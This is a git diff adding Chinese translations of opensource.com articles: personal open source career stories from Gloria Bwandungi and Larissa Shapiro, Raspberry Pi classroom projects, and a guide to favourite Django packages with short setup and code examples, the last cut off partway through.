+在我的经历中,那几周花在 DOS 命令上的时间仍然记忆犹新,在一些偏门的项目上耗费心血,并占据了宝贵的学习时间。Geocities 一向所有 Yahoo! 用户开放,我就创建了一个网站,用于发布一些由我用小型数码相机拍摄的个人图片。这个网站是我随性而为的,用来帮助家人和朋友,解决一些他们所遇到的电脑问题。同时也为教堂搭建了一个图书馆数据库。
+
+这意味着,我需要一直研究并尝试获取更多的信息,使它们变得更棒。上帝保佑,让互联网和开源砸在了我的面前。然后,30 天试用和 license 限制对我而言就变成了过去式。我可以完全不受这些限制,持续的使用 GIMP、Inkscape 和 OpenOffice。
+
+### 是时候正经了
+
+我很幸运,有商业伙伴看出了我故事中的奇妙。她也是个想象力丰富的人,对更高效、更便捷的互联这个世界,充满了各种美好的想法。我们根据我们以往成功道路中经历的痛点制定了解决方案,但执行却成了一个问题。我们都缺乏那种将产品带入生活的能力,每当我们试图将想法带到投资人面前时,都表现的尤为突出。
+
+我们需要学习编程。所以在 2015 年的夏末,我们踏上了征途,来到了 Holberton 学校的阶前。那是一所座落于旧金山由社区推进,基于项目教学的学校。
+
+我的商业伙伴一天早上找到我,并开始了一段充满她方式的对话,每当她有疯狂想法想要拉我入伙时。
+
+**Zee**: Gloria,我想和你说点事,在拒绝前能先听我说完吗?
+
+**Me**: 不行。
+
+**Zee**: 我们想要申请一所学校的全栈工程师。
+
+**Me**: 什么?
+
+**Zee**: 就是这,看!就是这所学校,我们要申请这所学校学习编程。
+
+**Me**: 我不明白。我们不是正在网上学 Python 和…
+
+**Zee**: 这不一样。相信我。
+
+**Me**: 那…
+
+**Zee**: 还不相信吗?
+
+**Me**: 好吧…我看看。
+
+### 抛开偏见
+
+我看到的和我们在网上听说的几乎差不多。这简直太棒了,以至于让人觉得不太真实,但我们还是决定尝试一下,双脚起跳,看看结果如何。
+
+要成为学生,我们需要经历四个步骤,仅仅是针对才能和态度,无关学历和编程经历的筛选。筛选便是课程的开始,通过它我们开始学习与合作。
+
+根据我和我合作伙伴的经验,相比 Holberton 学校的申请流程,其他的申请流程实在是太无聊了。就像场游戏。如果你完成了一项挑战,你就能通往下一关,在那里有别的有趣的挑战正等着你。我们创建了 Twitter 账号,在 Medium 上写博客,为了创建网站而学习 HTML 和 CSS, 打造了一个充满活力的社区,虽然在此之前我们并不知晓有谁会来。
+
+在线社区最吸引人的就是我们使用电脑的经验是多种多样的,而我们的背景和性别并非创始人(我们私下里称他为“The Trinity(三位一体)”)做出选择的因素。大家只是喜欢聚在一块交流。我们都是通过学习编程来提升自己计算机技术的聪明人。
+
+相较于其他的的申请流程,我们不需要泄露很多的身份信息。就像我的商业伙伴,她的名字里看不出她的性别和种族。直到最后一个步骤,在视频聊天的时候, The Trinity 才知道她是一位有色人种女性。迄今为止,促使她达到这个程度的只是她的热情和才华。肤色和性别,并没有妨碍或者帮助到她。还有比这更酷的吗?
+
+那个我们获得录取通知书的晚上,我们知道我们的命运已经改变,我们获得了原先梦寐以求的生活。2016 年 1 月 22 日,我们来到北至巴特瑞大街 98 号,去见我们的小伙伴 [Hippokampoiers][2],这是我们的初次见面。很明显,在见面之前,“The Trinity”就已经开始做一些令人激动的事了。他们已经聚集了一批形形色色的人,他们都专注于成为全栈工程师,并为之乐此不疲。
+
+这所大学有种与众不同的体验。感觉每天都是向编程的一次竭力的冲锋。我们着手的工程,并不会有很多指导,我们需要使用一切我们可以使用的资源找出解决方案。[Holberton 学校][1] 的办学宗旨便是向学员提供,相较于我们已知而言,更为多样的信息渠道。MOOCs(大型开放式课程)、教程、可用的开源软件和项目,以及线上社区层出不穷,将我们完成项目所需要的知识全都衔接了起来。加之宝贵的导师团队来指导我们制定解决方案,这所学校变得并不仅仅是一所学校;我们已经成为了求学者的社区。任何对软件工程感兴趣并对这种学习方法感兴趣的人,我都十分推荐这所学校。下次开课在 2016 年 10 月,并且会接受新的申请。虽然会让人有些悲喜交加,但是那真的很值得。
+
+### 开源问题
+
+我最早使用的开源系统是 [Fedora][3],一个 [Red Hat][4] 赞助的项目。在与 IRC 中一名成员一番惊慌失措的交流后,她推荐了这款免费的系统。 虽然在此之前,我还未独自安装过操作系统,但是这激起了我对开源的兴趣和日常使用计算机时对开源软件的依赖性。我们提倡为开源贡献代码,创造并使用开源的项目。我们的项目就在 Github 上,任何人都可以使用或是向它贡献出自己的力量。我们也会使用或以自己的方式为一些既存的开源项目做出贡献。在学校里,我们使用的大部分工具是开源的,例如 Fedora、[Vagrant][5]、[VirtualBox][6]、[GCC][7] 和 [Discourse][8],仅举几例。
+
+重回软件工程师之路以后,我始终憧憬着有这样一个时刻——能为开源社区做出一份贡献,能与他人分享我所掌握的知识。
+
+### Diversity Matters
+
+站在教室里,在着 29 双明亮的眼睛关注下交流心得,真是令人陶醉。学员中有 40% 是女性,有 44% 的有色人种。当你是一位有色人种且为女性,并身处于这个以缺乏多样而著名的领域时,这些数字就变得非常重要了。那是高科技圣地麦加上的绿洲。我知道我做到了。
+
+想要成为一个全栈的工程师是十分困难的,你甚至很难了解这意味着什么。这是一条充满挑战的路途,道路四周布满了对收获的未知。科技推动着未来飞速发展,而你也是美好未来很重要的一部分。虽然媒体在持续的关注解决科技公司的多样化的问题,但是如果能认清自己,了解自己,知道自己为什么想成为一名全栈工程师,这样你便能觅得一处生根发芽。
+
+不过可能最重要的是,提醒人们女性在计算机的发展史上扮演着多么重要的角色,以帮助更多的女性回归到科技界,并使她们充满期待,而非对自己的性别与能力感到犹豫。她们的才能将会描绘出不仅仅是科技的未来,而是整个世界的未来。
+
+
+------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/4/my-open-source-story-gloria-bwandungi
+
+作者:[Gloria Bwandungi][a]
+译者:[martin2011qi](https://github.com/martin2011qi)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/nappybrain
+[1]: https://www.holbertonschool.com/
+[2]: https://twitter.com/hippokampoiers
+[3]: https://en.wikipedia.org/wiki/Fedora_(operating_system)
+[4]: https://www.redhat.com/
+[5]: https://www.vagrantup.com/
+[6]: https://www.virtualbox.org/
+[7]: https://gcc.gnu.org/
+[8]: https://www.discourse.org/
diff --git a/translated/talk/my-open-source-story/20160505 A daughter of Silicon Valley shares her 'nerd' story.md b/translated/talk/my-open-source-story/20160505 A daughter of Silicon Valley shares her 'nerd' story.md
new file mode 100644
index 0000000000..279a7fd843
--- /dev/null
+++ b/translated/talk/my-open-source-story/20160505 A daughter of Silicon Valley shares her 'nerd' story.md
@@ -0,0 +1,82 @@
+”硅谷的女儿“的天才故事
+=======================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/myopensourcestory.png?itok=6TXlAkFi)
+
+在 2014 年,为了对网上一些关于女性在科技行业的缺失的评论作出回应,我的同事 [Crystal Beasley][1] 建立了一个能让在科技/信息安全方面工作的女性在网络上分享自己的“天才之路”。这篇文章就是我的故事。我把我的故事与你们分享是因为我相信榜样的力量,我也相信有一个人有很多的方式进入一个让自己满意的有挑战性的工作和一个实现了所有目标的人生。
+
+### 和电脑相伴的童年
+
+我,在其他的光环之下,是硅谷的女儿。我的故事不是一个观众变成舞台的主角的故事。也不是从小就为这份事业做贡献的故事。这个故事更多的是关于环境如何塑造你 — 通过它的那种已然存在的文化来改变你,如果你想要被改变的话。这不是从小就看是努力并为一个明确的目标而奋斗的故事,我知道这是关于特权的故事。
+
+我出生在曼哈顿,但是我在新泽西州长大,因为我的爸爸作为一个退伍军人在那里的罗格斯大学攻读计算机科学的博士学位。当我四岁时,学校里有人问我我的爸爸干什么谋生时,我说,“他就是看电视和捕捉小虫子,但是我从没有见过那些小虫子”(译者注:小虫子,bug)。他在家里有一台哑终端,这大概与他在博尔特-贝拉尼克-纽曼公司的工作有关,他会通过早期的互联网来进行它在人工智能方面的工作。我就在旁边看着。
+
+我没能玩上父亲的会抓小虫子的电视,但是我很早就接触到了技术领域,我很珍惜这个礼物。提早的熏陶对于一个未来的天才是十分必要的 — 所以,请花时间和你的小孩谈谈他以后要做什么!
+
+![](https://opensource.com/sites/default/files/resize/moss-520x433.png)
+
+>我父亲的终端和这个很类似——如果不是这个的话 CC BY-SA 4.0
+
+当我六岁时,我们搬到了加州。父亲在施乐的研究中心找到了一个工作。我记得那时我认为这个城市一定有很多熊,因为在它的旗帜上都有一个熊。在1979年,帕洛阿尔托还是一个大学城,还有果园和开阔地带。
+
+在帕洛阿尔托的公立学校待了一年之后,我的姐姐和我被送到了“半岛学校”,这个“模范学校”对我造成了深刻的影响。在那里,好奇心和创新意识是被推崇的,教育也是有学生自己决定的。我们很少在学校看到能叫做电脑的东西,但是在家就不同了。
+
+在父亲从施乐辞职之后,他就去了苹果,在那里他帮助研发——以及带回家让我玩的第一批电脑就是:Apple II 和 LISA。我的父亲在原先的 LISA 的研发团队。我直到现在还深刻的记得他让我们一次又一次的“玩鼠标”场景,因为他想让我的 3 岁大的妹妹对这个东西感到舒服——她也确实那样。
+
+![](https://opensource.com/sites/default/files/resize/600px-apple_lisa-520x520.jpg)
+
+>我们的 LISA 看起来就像这样,看到鼠标了吗?CC BY-SA 4.0
+
+在学校,我的数学的概念学得不错,但是基本计算却惨不忍睹。我的第一个学校的老师告诉我的家长,还有我,说我的数学很差以及我很“笨”。虽然我在“常规的”数学项目中表现出色,能理解一个 7 岁的孩子能理解的逻辑谜题,但是我不能完成我们每天早上都要做的“练习”。她说我傻,这事我不会忘记。在那之后的十年我都没能相信自己的逻辑能力和算法的水平。不要 低估你给孩子的说的话的力量。
+
+在我玩了几年爸爸的电脑之后,他从苹果跳到了 EA 又跳到了 SGI,我又体验了他带回来的新玩意。这让我们认为我们家的房子是镇里最酷的,因为我们在车库里有一个能玩 Doom 的 SGI 的机器。我不会太多的编程,但是现在我发现,在那些年里我对尝试新的科技不再恐惧。同时,我的学文学和教育的母亲,成为了一个科技行业的作家,她向我证实了一个人的职业可以改变以及科技行业的人也可以做母亲。我不是说这对她来说很简单,但是她让我认为这件是看起来很简单。你可能回想这些早期的熏陶能把我带到科技行业,但是它没有。
+
+### 本科时光
+
+我想我要成为一个小学教师,我就读米尔斯学院就是想要做这个。但是后来我开始研究女性,后来有研究神学,我这样做仅仅是由于我自己的一个渴求:我希望能理解人类的意志以及为更好的世界而努力。
+
+同时,我也感受到了互联网的巨大力量。在 1991 年,拥有你自己的 UNIX 的账户是很令人高兴的事,这件事值得你向全世界的人吹嘘。我仅仅从在互联网中“玩”就学到了不少,从那些愿意回答我提出的问题的人那里学到的就更多了。这些学习对我的职业生涯的影响不亚于我在学校教育部之中学到的知识。没有没有用的信息。我在一个女子学院度过了影响我一生的关键时期,然后那个女子学院的一个辉煌的女人跑进了计算机院,我不忍为这是一个事故。在那个老师的权力不算太大的学院,我们不止是被允许,甚至是被鼓励去尝试很多的道路(我们能接触到很多很多的科技,还能有聪明人来供我们求助),我也确实那样做了。我十分感激当年的教育。在那个学院,我也了解了什么是极客文化。
+
+之后我去了研究生院去学习 女权主义神学,但是技术行业的气息已经渗入我的灵魂。当我知道我不能成为一个教授或者一个专家时,我离开了学术圈,带着债务和很多点子回到了家。
+
+### 新的开端
+
+在 1995 年,我被我看见的万维网连接 人们以及分享想法和信息的能力所震惊(直到现在仍是如此)。我想要进入这个行业。看起来我好像要“女承父业”,但是我不知道我会用什么方式来这样做。我开始在硅谷做临时工,在我在太阳微系统公司得到我的第一个“技术”职位前做一些事情(为数据写最基础的数据库,技术手册印发钱的事务,备份工资单的存跟)。这些事很让人激动。(毕竟,我们是“点 com”的那个”点“)。
+
+在 Sun ,我努力学习,尽可能多的尝试我新事物。我的第一个工作是网页化(啥?这是一个单独的词汇)论文以及为测试中的 Solaris 修改一些基础的服务工具(大多数是Perl写的)。在那里最终在 Open Solaris 的测试版运行时我感受到了开源的力量。
+
+在那里我学到了一个很重要的事情。我发现在同样重视工程和教育的地方有一种气氛,在那里我的问题不再显得“傻”。我很庆幸我选对了导师和朋友。在决定为第二个孩子的出生产假之前,我上每一堂我能上的课程,读每一本我能读的书,尝试自学我在学校没有学习过的技术,商业以及项目管理方面的技能。
+
+### 重回工作
+
+当我准备重新工作时,Sun 已经不是一个值得回去的地方。所以,我收集了很多人的信息(网络是你的朋友),利用我的沟通技能最终建立了一个互联网门户(2005 年时,一切皆门户),并且开始了解 CRM,发布产品的方式,本地化,网络等知识。我这么做是基于我过去的尝试以及失败的经历所得出的教训,也是这个教训让我成功。我也认为我们需要这个方面的榜样。
+
+从很多方面来看,我的职业生涯的第一部分是 我的技术上的自我教育。这事发生的时间和地点都和现在不一样——我在帮助女性和其他弱势群体的组织工作,但是我之后成为一个技术行业的女性。当时我无疑,没有看到这个行业的缺陷,现在这个行业更加的厌恶女性,而不是更加喜欢她们。
+
+在这些事情之后,我还没有把自己当作一个榜样,或者一个高级技术人员。当我的一个在父母的圈子里认识极客朋友鼓励我申请一个看起来定位十分模糊且技术性很强的开源的非盈利基础设施商店(互联网系统协会,BIND,一个广泛部署的开源服务器的开发商,13 台 DNS 根域名服务器之一的运营商)的项目经理时,我很震惊。有很长一段时间,我都不知道他们为什么要雇佣我!我对 DNS ,基础设备,以及协议的开发知之甚少,但是我再次遇到了老师,并再度开始飞速发展。我花时间旅行,在关键流程攻关,搞清楚如何与高度国际化的团队合作,解决麻烦的问题,最重要的是,拥抱支持我们的开源和充满活力的社区。我几乎重新学了一切,通过试错的方式。我学习如何构思一个产品。如何通过建设开源社区,领导那些有这特定才能,技能和耐心的人,是他们给了产品价值。
+
+### 成为别人的导师
+
+当我在 ISC 工作时,我通过 [TechWomen 项目][2] (一个让来自中东和北非的技术行业的女性带到硅谷来接受教育的计划),我开始喜欢教学生以及支持那些女性,特别是在开源行业中奋斗的。这也就是我开始相信自己的能力的开端。我还需要学很多。
+
+当我第一次读 TechWomen 的广告时,我认为那些导师甚至都不会想要和我说话!我有冒名顶替综合征。当他们邀请我成为第一批导师(以及以后 6 年的导师)时,我很震惊,但是现在我学会了相信这些都是我努力得到的待遇。冒名顶替综合征是真实的,但是它能被时间冲淡。
+
+### 现在
+
+最后,我不得不离开我在 ISC 的工作。幸运的是,我的工作以及我的价值让我进入了 Mozilla ,在这里我的努力和我的幸运让我在这里有着重要的作用。现在,我是一名支持多样性的包容的高级项目经理。我致力于构建一个更多样化,更有包容性的 Mozilla ,站在之前的做同样事情的巨人的肩膀上,与最聪明友善的人们一起工作。我用我的激情来让人们找到贡献一个世界需要的互联网的有意义的方式:这让我兴奋了很久。我能看见,我做到了!
+
+通过对组织和个人行为的干预来用一种新的方法来改变一种文化这件事情和我的人生有着十分奇怪的联系 —— 从我的早期的学术生涯,到职业生涯再到现在。每天都是一个新的挑战,我想我最喜欢的就是在科技行业的工作,尤其是在开放互联网的工作。互联网天然的多元性是它最开始吸引我的原因,也是我还在寻求的——一个所有人都有获取的资源可能性,无论背景如何。榜样,导师,资源,以及最重要的,对不断发展的技术和开源文化的尊重能实现我相信它能实现的事 —— 包括给任何的平等的接入权和机会。
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/5/my-open-source-story-larissa-shapiro
+
+作者:[Larissa Shapiro][a]
+译者:[name1e5s](https://github.com/name1e5s)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/larissa-shapiro
+[1]: http://skinnywhitegirl.com/blog/my-nerd-story/1101/
+[2]: https://www.techwomen.org/mentorship/why-i-keep-coming-back-to-mentor-with-techwomen
diff --git a/translated/talk/yearbook2015/20151208 5 great Raspberry Pi projects for the classroom.md b/translated/talk/yearbook2015/20151208 5 great Raspberry Pi projects for the classroom.md
new file mode 100644
index 0000000000..06191d551c
--- /dev/null
+++ b/translated/talk/yearbook2015/20151208 5 great Raspberry Pi projects for the classroom.md
@@ -0,0 +1,98 @@
+5 个适合课堂教学的树莓派项目
+================================================================================
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/osdc-open-source-yearbook-lead3.png)
+
+图片来源 : opensource.com
+
+### 1. Minecraft Pi ###
+
+![](https://opensource.com/sites/default/files/lava.png)
+
+上图由树莓派基金会提供。遵循 [CC BY-SA 4.0.][1] 协议。
+
+Minecraft(我的世界)几乎是世界上每个青少年都极其喜爱的游戏 —— 在吸引年轻人注意力方面,它也是最具创意的游戏之一。伴随着每一个树莓派的游戏版本不仅仅是一个关于创造性思维的建筑游戏,它还带有一个编程接口,允许使用者通过 Python 代码来与 Minecraft 世界进行互动。
+
+对于教师来说,Minecraft: Pi 版本是一个鼓励学生们解决遇到的问题以及通过书写代码来执行特定任务的极好方式。你可以使用 Python API
+ 来建造一所房子,让它跟随你到任何地方;或在你所到之处修建一座桥梁;又或者是下一场岩溶雨;或在天空中显示温度;以及其他任何你能想像到的事物。
+
+可在 "[Minecraft Pi 入门][2]" 中了解更多相关内容。
+
+### 2. 反应游戏和交通指示灯 ###
+
+![](https://opensource.com/sites/default/files/pi_traffic_installed_yellow_led_on.jpg)
+
+上图由 [Low Voltage Labs][3] 提供。遵循 [CC BY-SA 4.0][1] 协议。
+
+在树莓派上进行物理计算是非常容易的 —— 只需将 LED 灯 和按钮连接到 GPIO 针脚上,再加上少量的代码,你就可以点亮 LED 灯并通过按按钮来控制物体。一旦你知道来执行基本操作的代码,下一步就可以随你的想像那样去做了!
+
+假如你知道如何让一盏灯闪烁,你就可以让三盏灯闪烁。选出三盏交通灯颜色的 LED 灯,你就可以编程出交通灯闪烁序列。假如你知道如何使用一个按钮来触发一个事件,然后你就有一个人行横道了!同时,你还可以找到诸如 [PI-TRAFFIC][4]、[PI-STOP][5]、[Traffic HAT][6] 等预先构建好的交通灯插件。
+
+这不总是关于代码的 —— 它还可以被用来作为一个的练习,用以理解真实世界中的系统是如何被设计出来的。计算思维在生活中的各种情景中都是一个有用的技能。
+
+![](https://opensource.com/sites/default/files/reaction-game.png)
+
+上图由树莓派基金会提供。遵循 [CC BY-SA 4.0][1] 协议。
+
+下面尝试将两个按钮和一个 LED 灯连接起来,来制作一个二人制反应游戏 —— 让灯在一段随机的时间中点亮,然后看谁能够先按到按钮!
+
+想了解更多的话,请查看 [GPIO 新手指南][7]。你所需要的尽在 [CamJam EduKit 1][8]。
+
+### 3. Sense HAT 像素宠物 ###
+
+Astro Pi— 一个增强版的树莓派 —将于今年 12 月(注:应该是去年的事了。)问世,但你并没有错过让你的手玩弄硬件的机会。Sense HAT 是一个用在 Astro Pi 任务中的感应器主板插件,且任何人都可以买到。你可以用它来做数据收集、科学实验、游戏或者更多。 观看下面这个由树莓派的 Carrie Anne 带来的 Gurl Geek Diaries 录像来开始一段美妙的旅程吧 —— 通过在 Sense HAT 的显示器上展现出你自己设计的一个动物像素宠物:
+
+注:youtube 视频
+
+
+在 "[探索 Sense HAT][9]" 中可以学到更多。
+
+### 4. 红外鸟箱 ###
+
+![](https://opensource.com/sites/default/files/ir-bird-box.png)
+上图由 [Low Voltage Labs][3] 提供。遵循 [CC BY-SA 4.0][1] 协议。
+
+让全班所有同学都能够参与进来的一个好的练习是 —— 在一个鸟箱中沿着某些红外线放置一个树莓派和 NoIR 照相模块,这样你就可以在黑暗中观看,然后通过网络或在网络中你可以从树莓派那里获取到视频流。等鸟进入笼子,然后你就可以在不打扰到它们的情况下观察它们。
+
+在这期间,你可以学习到所有关于红外和光谱的知识,以及如何用软件来调整摄像头的焦距和控制它。
+
+在 "[制作一个红外鸟箱][10]" 中你可以学到更多。
+
+### 5. 机器人 ###
+
+![](https://opensource.com/sites/default/files/edukit3_1500-alex-eames-sm.jpg)
+
+上图由 Low Voltage Labs 提供。遵循 [CC BY-SA 4.0][1] 协议。
+
+拥有一个树莓派,一些感应器和一个感应器控制电路板,你就可以构建你自己的机器人。你可以制作各种类型的机器人,从用透明胶带和自制底盘组合在一起的简易四驱车,一直到由游戏控制器驱动的具有自我意识,带有传感器和摄像头的金属马儿。
+
+学习如何直接去控制单个的发动机,例如通过 RTK Motor Controller Board (£8/$12),或者尝试新的 CamJam robotics kit (£17/$25) ,它带有发动机、轮胎和一系列的感应器 — 这些都很有价值并很有学习的潜力。
+
+另外,如何你喜欢更为骨灰级别的东西,可以尝试 PiBorg 的 [4Borg][11] (£99/$150) 或 [DiddyBorg][12] (£180/$273) 或者一干到底,享受他们的 DoodleBorg 金属版 (£250/$380) — 并构建一个他们声名远扬的 [DoodleBorg tank][13](很不幸的时,这个没有卖的) 的迷你版。
+
+另外请参考 [CamJam robotics kit worksheets][14]。
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/education/15/12/5-great-raspberry-pi-projects-classroom
+
+作者:[Ben Nuttall][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/bennuttall
+[1]:https://creativecommons.org/licenses/by-sa/4.0/
+[2]:https://opensource.com/life/15/5/getting-started-minecraft-pi
+[3]:http://lowvoltagelabs.com/
+[4]:http://lowvoltagelabs.com/products/pi-traffic/
+[5]:http://4tronix.co.uk/store/index.php?rt=product/product&product_id=390
+[6]:https://ryanteck.uk/hats/1-traffichat-0635648607122.html
+[7]:http://pythonhosted.org/gpiozero/recipes/
+[8]:http://camjam.me/?page_id=236
+[9]:https://opensource.com/life/15/10/exploring-raspberry-pi-sense-hat
+[10]:https://www.raspberrypi.org/learning/infrared-bird-box/
+[11]:https://www.piborg.org/4borg
+[12]:https://www.piborg.org/diddyborg
+[13]:https://www.piborg.org/doodleborg
+[14]:http://camjam.me/?page_id=1035#worksheets
diff --git a/translated/talk/yearbook2015/20160306 5 Favorite Open Source Django Packages.md b/translated/talk/yearbook2015/20160306 5 Favorite Open Source Django Packages.md
new file mode 100644
index 0000000000..81e999fd80
--- /dev/null
+++ b/translated/talk/yearbook2015/20160306 5 Favorite Open Source Django Packages.md
@@ -0,0 +1,164 @@
+5个最受喜爱的开源Django包
+================================================================================
+![Yearbook cover 2015](https://opensource.com/sites/default/files/styles/image-full-size/public/u23316/osdc-open-source-yearbook-lead8.png?itok=0_5-hdFE)
+
+图片来源:Opensource.com
+
+_Jacob Kaplan-Moss和Frank Wiles也参与了本文的写作。_
+
+Django围绕“[可重用应用][1]”观点建立:自我包含了提供可重复使用特性的包。你可以将这些可重用应用组装起来,在加上适用于你的网站的特定代码,来搭建你自己的网站。Django具有一个丰富多样的、由可供你使用的可重用应用组建起来的生态系统——PyPI列出了[超过8000个 Django 应用][2]——可你该如何知道哪些是最好的呢?
+
+为了节省你的时间,我们总结了五个最受喜爱的 Django 应用。它们是:
+- [Cookiecutter][3]: 建立 Django 网站的最佳方式。
+- [Whitenoise][4]: 最棒的静态资源服务器。
+- [Django Rest Framework][5]: 使用 Django 开发 REST API 的最佳方式。
+- [Wagtail][6]: 基于 Django 的最佳内容管理系统。
+- [django-allauth][7]: 提供社交账户登录的最佳应用(如 Twitter, Facebook, GitHub 等)。
+
+我们同样推荐你查看 [Django Packages][8],一个可重用 Django 应用的目录。Django Packages 将 Django 应用组织成“表格”,你可以在功能相似的不同应用之间进行比较并做出选择。你可以查看每个包中提供的特性,和使用统计情况。(比如:这是[ REST 工具的表格][9],也许可以帮助你理解我们为何推荐 Django REST Framework.
+
+## 为什么你应该相信我们?
+
+我们使用 Django 的时间比几乎其他人都长。在 Django 发布之前,我们当中的两个人(Frank 和 Jacob)在 [Lawrence Journal-World][10] (Django 的发源地)工作(事实上他们两人推动了 Django 开源发布的进程)。我们在过去的八年当中运行着一个咨询公司,来建议公司使用 Django 去将事情做到最好。
+
+所以,我们见证了Django项目和社群的完整历史,我们见证了流行软件包的兴起和没落。在我们三个中,我们可能私下试用了8000个应用中的一半以上,或者我们知道谁试用过这些。我们对如何使应用变得坚实可靠有着深刻的理解,并且我们对给予这些应用持久力量的来源也有不错的理解。
+
+## 建立Django网站的最佳方式:[Cookiecutter][3]
+
+建立一个新项目或应用总是有些痛苦。你可以用Django内建的 `startproject`。不过,如果你像我们一样,你可能会对你的办事方式很挑剔。Cookiecutter 为你提供了一个快捷简单的方式来构建易于使用的项目或应用模板,从而解决了这个问题。一个简单的例子:键入 `pip install cookiecutter`,然后在命令行中运行以下命令:
+
+```bash
+$ cookiecutter https://github.com/marcofucci/cookiecutter-simple-django
+```
+
+接下来你需要回答几个简单的问题,比如你的项目名称、目录、作者名字、E-Mail和其他几个关于配置的小问题。这些能够帮你补充项目相关的细节。我们使用最最原始的 "_foo_" 作为我们的目录名称。所以 cokkiecutter 在子目录 "_foo_" 下建立了一个简单的 Django 项目。
+
+如果你在"_foo_"项目中闲逛,你会看见你刚刚选择的其它设置已通过模板,连同子目录一同嵌入到文件当中。这个“模板”在我们刚刚在执行 `cookiecutter` 命令时输入的 Github 仓库 URL 中定义。这个样例工程使用了一个 Github 远程仓库作为模板;不过你也可以使用本地的模板,这在建立非重用项目时非常有用。
+
+我们认为 cookiecutter 是一个极棒的 Django 包,但是,事实上其实它在面对纯 Python 甚至非 Python 相关需求时也极为有用。你能够将所有文件依你所愿精确摆放在任何位置上,使得 cookiecutter 成为了一个简化工作流程的极佳工具。
+
+## 最棒的静态资源服务器:[Whitenoise][4]
+
+多年来,托管网站的静态资源——图片、Javascript、CSS——都是一件很痛苦的事情。Django 内建的 [django.views.static.serve][11] 视图,就像Django文章所述的那样,“在生产环境中不可靠,所以只应为开发环境的提供辅助功能。”但使用一个“真正的” Web 服务器,如 NGINX 或者借助 CDN 来托管媒体资源,配置起来会相当困难。
+
+Whitenoice 很简洁地解决了这个问题。它可以像在开发环境那样轻易地在生产环境中设置静态服务器,并且针对生产环境进行了加固和优化。它的设置方法极为简单:
+
+1. 确保你在使用 Django 的 [contrib.staticfiles][12] 应用,并确认你在配置文件中正确设置了 `STATIC_ROOT` 变量。
+
+2. 在 `wsgi.py` 文件中启用 Whitenoise:
+
+ ```python
+ from django.core.wsgi import get_wsgi_application
+ from whitenoise.django import DjangoWhiteNoise
+
+ application = get_wsgi_application()
+ application = DjangoWhiteNoise(application)
+ ```
+
+配置它真的就这么简单!对于大型应用,你可能想要使用一个专用的媒体服务器和/或一个 CDN,但对于大多数小型或中型 Django 网站,Whitenoise 已经足够强大。
+
+如需查看更多关于 Whitenoise 的信息,[请查看文档][13]。
+
+## 开发REST API的最佳工具:[Django REST Framework][5]
+
+REST API 正在迅速成为现代 Web 应用的标准功能。与一个 API 进行简短的会话,你只需使用 JSON 而不是 HTML,当然你可以只用 Django 做到这些。你可以制作自己的视图,设置合适的 `Content-Type`, 然后返回 JSON 而不是渲染后的 HTML 响应。这是在像 [Django Rest Framework][14](下称DRF)这样的API框架发布之前,大多数人所做的。
+
+如果你对 Django 的视图类很熟悉,你会觉得使用DRF构建REST API与使用它们很相似,不过 DRF 只针对特定 API 使用场景而设计。在一般 API 设计中,你会用到它的不少代码,所以我们强调了一些 DRF 的特性来使你更快地接受它,而不是去看一份让你兴奋的示例代码:
+
+* 可自动预览的 API 可以使你的开发和人工测试轻而易举。你可以查看 DRF 的[示例代码][15]。你可以查看 API 响应,并且它支持 POST/PUT/DELETE 类型的操作,不需要你做任何事。
+
+
+* 认证方式易于迁移,如OAuth, Basic Auth, 或API Tokens.
+* 内建请求速度限制。
+* 当与 [django-rest-swagger][16] 结合时,API文档几乎可以自动生成。
+* 第三方库拥有广泛的生态。
+
+当然你可以不依赖 DRF 来构建 API,但我们无法推测你不开始使用 DRF 的原因。就算你不使用 DRF 的全部特性,使用一个成熟的视图库来构建你自己的 API 也会使你的 API 更加一致、完全,更能提高你的开发速度。如果你还没有开始使用 DRF, 你应该找点时间去体验一下。
+
+## 以 Django 为基础的最佳 CMS:[Wagtail][6]
+
+Wagtail是当下Django CMS(内容管理系统)世界中最受人青睐的应用,并且它的热门有足够的理由。就想大多数的 CMS 一样,它具有极佳的灵活性,可以通过简单的 Django 模型来定义不同类型的页面及其内容。使用它,你可以从零开始,在几个小时而不是几天之内来和建造一个基本可以运行的内容管理系统。举一个小例子,为你公司的员工定义一个页面类型可以像下面一样简单:
+
+```python
+from wagtail.wagtailcore.models import Page
+from wagtail.wagtailcore.fields import RichTextField
+from wagtail.wagtailadmin.edit_handlers import FieldPanel, MultiFieldPanel
+from wagtail.wagtailimages.edit_handlers import ImageChooserPanel
+
+class StaffPage(Page):
+ name = models.CharField(max_length=100)
+ hire_date = models.DateField()
+ bio = models.RichTextField()
+ email = models.EmailField()
+ headshot = models.ForeignKey('wagtailimages.Image', null=True, blank=True)
+ content_panels = Page.content_panels + [
+ FieldPanel('name'),
+ FieldPanel('hire_date'),
+ FieldPanel('email'),
+ FieldPanel('bio',classname="full"),
+ ImageChoosePanel('headshot'),
+ ]
+```
+
+然而,Wagtail 真正出彩的地方在于它的灵活性及其易于使用的现代化管理页面。你可以控制不同类型的页面在哪网站的哪些区域可以访问,为页面添加复杂的附加逻辑,还可以极为方便地取得标准的适应/审批工作流。在大多数 CMS 系统中,你会在开发时在某些点上遇到困难。而使用 Wagtail 时,我们经过不懈努力找到了一个突破口,使得让我们轻易地开发出一套简洁稳定的系统,使得程序完全依照我们的想法运行。如果你对此感兴趣,我们写了一篇[深入理解 Wagtail][17].
+
+## 提供社交账户登录的最佳工具:[django-allauth][7]
+
+django-allauth 是一个能够解决你的注册和认证需求的、可重用的Django应用。无论你需要构建本地注册系统还是社交账户注册系统,django-allauth 都能够帮你做到。
+
